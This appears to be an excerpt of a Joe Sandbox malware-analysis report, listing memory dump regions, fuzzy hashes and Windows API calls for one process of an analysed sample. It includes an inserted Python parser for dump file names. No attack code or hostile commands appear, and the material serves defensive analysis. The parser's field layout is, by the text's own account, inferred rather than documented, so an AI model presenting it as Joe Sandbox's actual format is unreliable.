                                                                                                                            • Opcode Fuzzy Hash: cd7b7cc6089db85a917c869ea418fe9b4336126d354651c2af7450458f0d2819
                                                                                                                            • Instruction Fuzzy Hash: FD32CF75E04269CFEB64CF28C940BA9BBB2BB48300F1581EAD889B7381D7745E85CF55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%
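The Memory Dump Source entries above name the regions of process 21 that were dumped and that the functions on this page live in. The following is an added example for this report page, not Joe Sandbox code: a small Python parser for those `.sdmp` names that decodes the base address and page protection of each region and answers which dump contains a given code address (for instance the function entry 408d43 above). The field layout it assumes (process index, dump round, dump id, base address, page protection, three trailing fields left undecoded) is inferred from the names on this page and from the snapshot name `hcaresult_21_2_400000_...`; it is an assumption, not a documented format. The protection field is decoded with the winnt.h PAGE_* constants, which is consistent with what the names show for a mapped PE: 0x20 (execute/read) at 401000, 0x02 (read-only) at the 400000 header and at 40B000, 0x04 (read/write) for the data regions, 0x08 (write-copy) for the last two.

```python
"""Decode Joe Sandbox .sdmp region names and locate an address in them.

Added example; the sdmp field layout below is an assumption inferred from the
names listed on this report page, not a documented Joe Sandbox format.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# winnt.h page-protection constants (real values).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE_PROTECTS = {0x10, 0x20, 0x40, 0x80}

# Assumed layout: proc.run.dump_id.base.protect.<three undecoded fields>.sdmp
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9a-f]{8})\.(?P<run>[0-9a-f]{8})\.(?P<dump_id>[0-9a-f]+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})"
    r"(?:\.[0-9a-f]{8}){3}\.sdmp$",
    re.IGNORECASE,
)

# The region names exactly as listed on this page for process 21 (not invented).
PAGE_DUMPS = [
    "00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp",
    "00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmp",
    "00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmp",
    "00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmp",
    "00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmp",
    "00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmp",
    "00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmp",
    "00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmp",
    "00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmp",
    "00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmp",
    "00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmp",
]


@dataclass(frozen=True)
class Region:
    proc: int      # process index within the analysis (0x15 -> process 21)
    run: int       # dump round (2 -> second snapshot)
    base: int      # start virtual address of the dumped region
    protect: int   # raw protection field
    name: str

    @property
    def protection(self) -> str:
        return PAGE_PROTECT.get(self.protect, f"unknown(0x{self.protect:x})")

    @property
    def executable(self) -> bool:
        return self.protect in EXECUTABLE_PROTECTS


def parse_sdmp(name: str) -> Region:
    """Split one .sdmp name into its fields; raises ValueError on a foreign name."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not an sdmp region name: {name}")
    return Region(int(m["proc"], 16), int(m["run"], 16), int(m["base"], 16),
                  int(m["protect"], 16), name)


def region_table(names: List[str]) -> List[Tuple[Region, Optional[int]]]:
    """Regions sorted by base; each region ends where the next one starts.
    The last region's size is not recoverable from the name, so its end is None."""
    regions = sorted((parse_sdmp(n) for n in names), key=lambda r: r.base)
    return [(r, regions[i + 1].base if i + 1 < len(regions) else None)
            for i, r in enumerate(regions)]


def find_region(names: List[str], addr: int) -> Optional[Region]:
    """Return the dumped region that contains addr, or None if no region starts at or below it."""
    for region, end in region_table(names):
        if region.base <= addr and (end is None or addr < end):
            return region
    return None


def executable_regions(names: List[str]) -> List[int]:
    """Bases of all regions whose protection allows execution (where code lives)."""
    return [r.base for r, _ in region_table(names) if r.executable]
```

Usage: `find_region(PAGE_DUMPS, 0x408D43)` resolves the function entry on this page to the region dumped from 401000 (execute/read), and `executable_regions(PAGE_DUMPS)` reports that it is the only executable region in the list, which is what one expects for a single-section .text image at 400000.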

                                                                                                                            Control-flow Graph

                                                                                                                            Rendered graph not preserved; summary of the edge list: entry block 4093bf-4093c6; 75 basic blocks (numbered 660-734) spanning 408a9f-409b10, sharing the block range 408a9f-409b10 with the graph above; blocks that call APIs: 408b4d-408b63 GlobalFree, 408b69-408b90 GlobalAlloc, 408c45-408c54 GlobalFree, 408c55-408c76 GlobalAlloc.
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 96471980e818e90389b8f28b0725736ff68ec6d8f08f1ae4e00d8e9b25cb3d10
                                                                                                                            • Instruction ID: 2ff6cda69edbaac919d86c53bc6808f5f303a55c6bc0211467f0ef21a37139c8
                                                                                                                            • Opcode Fuzzy Hash: 96471980e818e90389b8f28b0725736ff68ec6d8f08f1ae4e00d8e9b25cb3d10
                                                                                                                            • Instruction Fuzzy Hash: A7229B74E05269CBEB64CF18C980BA9BBB2BB48300F1482EAD84DB7381D7345E85CF55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            Rendered graph not preserved; summary of the edge list: entry block 40893d-408965; 43 basic blocks (numbered 735-777) spanning 40893d-409b10, again sharing the block range 408a9f-409b10 with the graphs above; blocks that call APIs: 408b4d-408b63 GlobalFree, 408b69-408b90 GlobalAlloc, 408c45-408c54 GlobalFree, 408c55-408c76 GlobalAlloc.
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Global$AllocFree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3394109436-0
                                                                                                                            • Opcode ID: 40efa2268de9016f5e6645c0c9238ed231c7493705202486a25610001e8f553c
                                                                                                                            • Instruction ID: 196290a36a957acb70ae20b533fcf0c155bb910872d15f7e614b6225c37c67e6
                                                                                                                            • Opcode Fuzzy Hash: 40efa2268de9016f5e6645c0c9238ed231c7493705202486a25610001e8f553c
                                                                                                                            • Instruction Fuzzy Hash: 05026CB4D05268CFDBA4CF68C980B99BBF1BB48300F1082EAD959A7342D7349E85CF55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00407935: CharNextA.USER32(?,00000000,75923160,?,00408184,?,?,?,00000000,?,004085CF), ref: 0040794A
                                                                                                                              • Part of subcall function 00407935: CharNextA.USER32(75923160,?,00408184,?,?,?,00000000,?,004085CF), ref: 00407952
                                                                                                                            • SetCurrentDirectoryA.KERNEL32(00000000,00000000), ref: 00401930
                                                                                                                              • Part of subcall function 004078A4: CharNextA.USER32 ref: 004078BE
                                                                                                                            • GetFileAttributesA.KERNEL32 ref: 004018E0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CharNext$AttributesCurrentDirectoryFile
                                                                                                                            • String ID: \
                                                                                                                            • API String ID: 15404496-2967466578
                                                                                                                            • Opcode ID: d78038b2043e385ee061b609f29dc6a012e38869a8f0274da12750c867810de6
                                                                                                                            • Instruction ID: b3c069ff8fe5fca2169c100ba5b4309268a8952e4838bd2cd3cdfa24001796cc
                                                                                                                            • Opcode Fuzzy Hash: d78038b2043e385ee061b609f29dc6a012e38869a8f0274da12750c867810de6
                                                                                                                            • Instruction Fuzzy Hash: E22196B19087419ED7107F2A8C4476ABBE8AF41314F15897FE4D5A33E1D63D4581CB2B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00407CB6: lstrcpynA.KERNEL32(?,?,?,?,?,?,00404457), ref: 00407CD1
                                                                                                                              • Part of subcall function 00407935: CharNextA.USER32(?,00000000,75923160,?,00408184,?,?,?,00000000,?,004085CF), ref: 0040794A
                                                                                                                              • Part of subcall function 00407935: CharNextA.USER32(75923160,?,00408184,?,?,?,00000000,?,004085CF), ref: 00407952
                                                                                                                            • lstrlenA.KERNEL32(?,00000000,?,?,?,00000000,?,004085CF), ref: 004081BE
                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,?,?,00000000,?,?,?,00000000,?,004085CF), ref: 004081F7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                            • String ID: C:\
                                                                                                                            • API String ID: 3248276644-3404278061
                                                                                                                            • Opcode ID: 2da7ec1753567bed1e155ededaacee0951334442434f81bdc17e756d419ccca8
                                                                                                                            • Instruction ID: a4b91be4712b2a5abe4fc9de88cdddcc6cd402f2cf4946f98fb9fcd9c72e04c7
                                                                                                                            • Opcode Fuzzy Hash: 2da7ec1753567bed1e155ededaacee0951334442434f81bdc17e756d419ccca8
                                                                                                                            • Instruction Fuzzy Hash: D6118FB0508314AAD710ABA69A4167A7BD89F05354F46447FECC0AA285CB3C5852866F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
Similarity
• API ID: MessageSend
• String ID: 0u
• API String ID: 3850602802-3203441087
• Opcode ID: 0f8c1266bbb926ccc1bd59e027622b1526ca312be5caf6883b3757b9e2fe7e12
• Instruction ID: 587040a18b5e8d3ddabbac84dae9583a5ca4581ff6aa0f06bd791ecb2da4f76d
• Opcode Fuzzy Hash: 0f8c1266bbb926ccc1bd59e027622b1526ca312be5caf6883b3757b9e2fe7e12
• Instruction Fuzzy Hash: 2811B172A043009FC710BF29D88911BBFE8EB40351F50C67EF854A73A0E338D6058B99
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
Similarity
• API ID: CountFileNameTempTick
• String ID: nsa
• API String ID: 1716503409-2209301699
• Opcode ID: b0a3207c486979766b199e0870a403b1f3979b7e2f67fc1e41fde7ae102ddd2e
• Instruction ID: 856d399887dd27b7ff2090b6ba205bffd5fa5b63c1769944cd833ed7d7811f75
• Opcode Fuzzy Hash: b0a3207c486979766b199e0870a403b1f3979b7e2f67fc1e41fde7ae102ddd2e
• Instruction Fuzzy Hash: 2CF0C272E082049FCB10AF69D88879FBFB4EF84310F00843AE95497380D6749515CB97
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a578235fd7ef3aed2a2d552e65bc1af2bfd9bf356f91058c6dae311955d0e3a7
• Instruction ID: 373024fc2fed516bdc636a623b7a3c01618f37309bfd328d060bf71c45cb50f6
• Opcode Fuzzy Hash: a578235fd7ef3aed2a2d552e65bc1af2bfd9bf356f91058c6dae311955d0e3a7
• Instruction Fuzzy Hash: 2FE18A75E05269CFEB64CF68C980B99BBB1BB48300F1081EAD84DA7381D774AE85CF55
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1580e02ebf7c4fca29966eb1b7433a0a3187ed73c579ff4eb24ab240cbf4b120
• Instruction ID: a08f90893e9a4040dbcaa68aabc4f5c37fecb49a8b953bcbec771c1c1b16f75e
• Opcode Fuzzy Hash: 1580e02ebf7c4fca29966eb1b7433a0a3187ed73c579ff4eb24ab240cbf4b120
• Instruction Fuzzy Hash: D1E18974E05269CFEB64CF68C984BA9BBB1BB48300F1481EAD859B7381D7349E85CF15
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
Similarity
• API ID: Global$AllocFree
• String ID:
• API String ID: 3394109436-0
• Opcode ID: 1376a99fa1b3c8b711226efaa9cd125e7b0aae65b997332d787d10eea2378ea6
• Instruction ID: cf37d5954fa70898b434e0d26c6706b10c8171271484cbeb9454a15f2979c00d
• Opcode Fuzzy Hash: 1376a99fa1b3c8b711226efaa9cd125e7b0aae65b997332d787d10eea2378ea6
• Instruction Fuzzy Hash: 58E19B74E05269CFEB64CF68C984BA9BBB1BB48300F1485EAD849A7381D7349E85CF15
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0d3edd96235aad2e448edd85fe0051959f4d3e71b7dd2dead95b0c62df9fb41c
• Instruction ID: 6ef1666d030b3683f745449ade9432935f6c1ed2423b4b2fea7fa3c30e0d11e8
• Opcode Fuzzy Hash: 0d3edd96235aad2e448edd85fe0051959f4d3e71b7dd2dead95b0c62df9fb41c
• Instruction Fuzzy Hash: DFD169B4D05269CFEB64CF68C984B99BBB1BB48300F1081EAD84DA7391D734AE85CF55
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b40b5ad18bbb895345efcde55e0179b9719697a428ab1875b5866f95c7fbef08
                                                                                                                            • Instruction ID: 98c6a34e011fea02c5fd1f307661bc496968a447f3de359247ec3e7382062383
                                                                                                                            • Opcode Fuzzy Hash: b40b5ad18bbb895345efcde55e0179b9719697a428ab1875b5866f95c7fbef08
                                                                                                                            • Instruction Fuzzy Hash: 54D178B4D052698FEB64CF68C980B99BBB1BB48300F1481EAD84DA7381D734AE85CF55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
